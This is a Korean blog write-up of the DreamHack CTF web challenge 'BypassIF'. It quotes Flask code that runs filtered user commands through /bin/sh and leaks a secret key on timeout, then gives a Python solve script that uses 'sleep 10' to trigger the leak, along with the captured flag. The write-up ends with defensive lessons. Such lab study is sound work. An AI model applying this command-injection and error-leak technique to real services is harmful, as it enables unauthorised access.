[🥉 Bronze 3] sleep 한 줄로 KEY를 흘리게 만들기 — DreamHack BypassIF 풀이

문제: DreamHack — BypassIF 분류: Web 난이도: 🥉 Bronze 3 FLAG: DH{9c73a5122e06f1f7a245dbe628ba96ba68a8317de36dba45f1373a3b9a631b92}

문제 개요

항목	내용
문제명	BypassIF
난이도	🥉 Bronze 3
분류	Web (Flask)
제공 파일 / 서버	`app.py` 등 소스 일체 / `http://<instance-host>:<port>/` (인스턴스마다 변경)
핵심 취약점 / 기법	명령 필터 우회 → 타임아웃 예외로 KEY 유출

"Admin의 KEY가 필요합니다. 알맞은 KEY를 입력해 플래그를 획득하세요."

소스를 까보면 KEY는 md5(flag)다. 플래그를 모르니 KEY도 직접 만들 수 없다. 그런데 KEY를 모르는 채로 KEY를 손에 넣게 해주는 구멍이 코드 안에 그대로 들어있다. 제목의 IF는 그 구멍이 있는 분기문을 가리킨다.

🔬 분석 — `/flag` 한 군데에 모든 게 모여 있다

핵심은 app.py의 /flag 라우트다. 전부 옮기면 이렇다.

FLAG = open("./flag.txt", "r").read()
KEY = hashlib.md5(FLAG.encode()).hexdigest()       # KEY = md5(flag)
guest_key = hashlib.md5(b"guest").hexdigest()
 
def filter_cmd(cmd):
    alphabet = list(string.ascii_lowercase)        # a-z
    alphabet.extend([' '])                          # + 공백
    alphabet.extend('0123456789')                   # + 숫자
    command_list = ['flag','cat','chmod','head','tail','less','awk','more','grep']
    for c in command_list:
        if c in cmd:
            return True                             # 금지 단어 → 차단
    for c in cmd:
        if c not in alphabet:
            return True                             # 허용 문자 외 → 차단
    # 둘 다 통과하면 암묵적으로 None 반환 (falsy)
 
@app.route('/flag', methods=['POST'])
def flag():
    key = request.form.get('key', '')
    cmd = request.form.get('cmd_input', '')
    if cmd == '' and key == KEY:
        return render_template('flag.html', txt=FLAG)        # ← 목표
    elif cmd == '' and key == guest_key:
        return render_template('guest.html', txt=f"guest key: {guest_key}")
    if cmd != '' or key == KEY:
        if not filter_cmd(cmd):
            try:
                output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
                return render_template('flag.html', txt=output.decode('utf-8'))
            except subprocess.TimeoutExpired:
                return render_template('flag.html', txt=f'Timeout! Your key: {KEY}')
            except subprocess.CalledProcessError:
                return render_template('flag.html', txt="Error!")
            return render_template('flag.html')
        ...

세 가지가 눈에 들어온다.

cmd_input이 비어있지 않으면 if cmd != '' or key == KEY:가 참이 되고, 필터만 통과하면 /bin/sh -c cmd가 그대로 실행된다. 사실상 명령 인젝션이다.

대신 filter_cmd가 입력을 검사한다. 금지 단어(flag, cat, chmod, head, tail, less, awk, more, grep)가 들어있으면 막고, 소문자·공백·숫자 외의 문자가 하나라도 있으면 막는다. /, ., *, ?, 따옴표가 전부 걸린다.

그리고 마지막 — 실행이 5초를 넘기면 TimeoutExpired로 빠지면서 f'Timeout! Your key: {KEY}'를 응답에 박아 넣는다. KEY를 모르는 사람한테 KEY를 친절하게 알려주는 줄이다.

파일을 직접 읽는 길은 막혀 있다

처음엔 명령 실행이 되니 그냥 플래그 파일을 읽으면 끝이라고 생각했다. 그런데 막상 해보면 안 된다.

파일명이 flag.txt인데 flag는 금지 단어다.
.도 허용 문자가 아니라 막힌다. / 역시 막혀 경로를 쓸 수 없다.
*, ? 같은 글롭 문자도 허용 목록에 없다.

소문자·숫자·공백만으로 flag.txt를 가리킬 방법이 없다. cat, grep, head 류 읽기 명령도 죄다 금지어다. 파일을 직접 긁는 길은 닫혀 있다.

그럼 남은 건 KEY를 흘리게 만드는 TimeoutExpired 분기다.

💣 핵심 — 필터를 통과하는 명령으로 일부러 타임아웃 내기

sleep 10을 보자. 소문자와 공백, 숫자만으로 이루어져 있고 금지 단어도 없다. filter_cmd를 그대로 통과한다.

filter_cmd("sleep 10")   # → None (falsy) → not None == True → 실행

실행되면 /bin/sh -c "sleep 10"이 10초를 잔다. timeout=5에 걸려 TimeoutExpired가 터지고, 서버는 이렇게 답한다.

Timeout! Your key: <md5(flag)>

KEY를 모른 채로 KEY를 받아냈다. sleep 10 한 줄이 전부다.

cmd_input=sleep 10 → 5초 타임아웃, KEY가 응답에 노출됨

받은 KEY를 다시 제출한다

이제 맨 위 분기로 돌아간다.

if cmd == '' and key == KEY:
    return render_template('flag.html', txt=FLAG)

cmd_input은 비워두고 key에 방금 유출한 해시를 넣어 POST하면 cmd == '' and key == KEY가 참이 되어 flag.html이 진짜 플래그를 렌더한다.

참고로 guest_key = md5("guest")는 소스에 그대로 박혀 있어서, 그 값을 넣으면 guest 페이지가 뜬다. 인증 흐름이 어떻게 갈리는지 확인하는 용도로만 의미가 있고 플래그와는 무관하다.

🚀 Full Exploit

두 번의 요청이면 끝난다.

#!/usr/bin/env python3
import re
import requests
 
BASE = "http://host8.dreamhack.games:12588"
 
# 1) 필터 통과하는 sleep으로 일부러 5초 타임아웃 → except 분기에서 KEY 노출
r = requests.post(f"{BASE}/flag", data={"key": "", "cmd_input": "sleep 10"}, timeout=30)
key = re.search(r"Your key: ([0-9a-f]{32})", r.text).group(1)
print(f"[+] leaked KEY (md5 of flag): {key}")
 
# 2) 유출한 KEY를 cmd_input='' 와 함께 제출 → flag.html이 진짜 플래그 렌더
r = requests.post(f

[+] leaked KEY (md5 of flag): 409ac0d96943d3da52f176ae9ff2b974
[+] FLAG: DH{9c73a5122e06f1f7a245dbe628ba96ba68a8317de36dba45f1373a3b9a631b92}

solve.py 실행 — sleep 타임아웃으로 KEY 유출 후 플래그 획득

유출된 KEY가 실제 md5(flag)와 맞는지도 확인해두면 깔끔하다.

>>> import hashlib
>>> hashlib.md5(b"DH{9c73a5122e06f1f7a245dbe628ba96ba68a8317de36dba45f1373a3b9a631b92}").hexdigest()
'409ac0d96943d3da52f176ae9ff2b974'   # = 유출한 KEY

DH{9c73a5122e06f1f7a245dbe628ba96ba68a8317de36dba45f1373a3b9a631b92}

📝 정리

필터는 입력만 본다.

filter_cmd는 금지 단어와 허용 문자를 꼼꼼히 검사하지만, sleep처럼 무해해 보이는 명령은 막을 이유가 없다. 문제는 그 명령이 만들어내는 상태 — 5초를 넘기는 실행 시간 — 를 아무도 검사하지 않았다는 점이다.

에러 메시지에 비밀을 담지 않는다.

Timeout! Your key: {KEY}. 디버깅용으로 끼워 넣었을 법한 한 줄이지만, 이 KEY는 곧 플래그의 해시다. 예외 경로는 정상 경로만큼 자주 점검받지 못해서 이런 누출이 잘 남는다.

파일을 직접 못 읽어도 우회로는 있다.

flag, ., /가 다 막혀 파일 읽기는 닫혀 있었지만, 결국 필요한 건 파일 내용이 아니라 KEY였고 그건 타임아웃 한 번으로 나왔다. 막힌 정문 대신 코드가 스스로 열어둔 옆문을 찾는 게 이 문제의 전부였다.

[🥉 Bronze 3] sleep 한 줄로 KEY를 흘리게 만들기 — DreamHack BypassIF 풀이

댓글

관련 글

[🥉 Bronze 2] GET만 열어둔 Flask 라우트를 HEAD로 뚫기 — DreamHack blind-command 풀이

[🥉 Bronze 4] PHP 정규식 3겹 뚫기 — preg_replace 겹침·알파벳 없는 비번·flag 필터 우회 RCE — DreamHack phpreg 풀이

[🥈 Silver 2] SSRF로 내부 포트 스캔 — netloc 문자열 필터를 0.0.0.0으로 우회 — DreamHack web-ssrf 풀이

문제 개요

🔬 분석 — `/flag` 한 군데에 모든 게 모여 있다

파일을 직접 읽는 길은 막혀 있다

💣 핵심 — 필터를 통과하는 명령으로 일부러 타임아웃 내기

받은 KEY를 다시 제출한다

🚀 Full Exploit

📝 정리

댓글

관련 글

[🥉 Bronze 2] GET만 열어둔 Flask 라우트를 HEAD로 뚫기 — DreamHack blind-command 풀이

[🥉 Bronze 4] PHP 정규식 3겹 뚫기 — preg_replace 겹침·알파벳 없는 비번·flag 필터 우회 RCE — DreamHack phpreg 풀이

[🥈 Silver 2] SSRF로 내부 포트 스캔 — netloc 문자열 필터를 0.0.0.0으로 우회 — DreamHack web-ssrf 풀이

문제 개요

🔬 분석 — /flag 한 군데에 모든 게 모여 있다

파일을 직접 읽는 길은 막혀 있다

💣 핵심 — 필터를 통과하는 명령으로 일부러 타임아웃 내기

받은 KEY를 다시 제출한다

🚀 Full Exploit

📝 정리

🔬 분석 — `/flag` 한 군데에 모든 게 모여 있다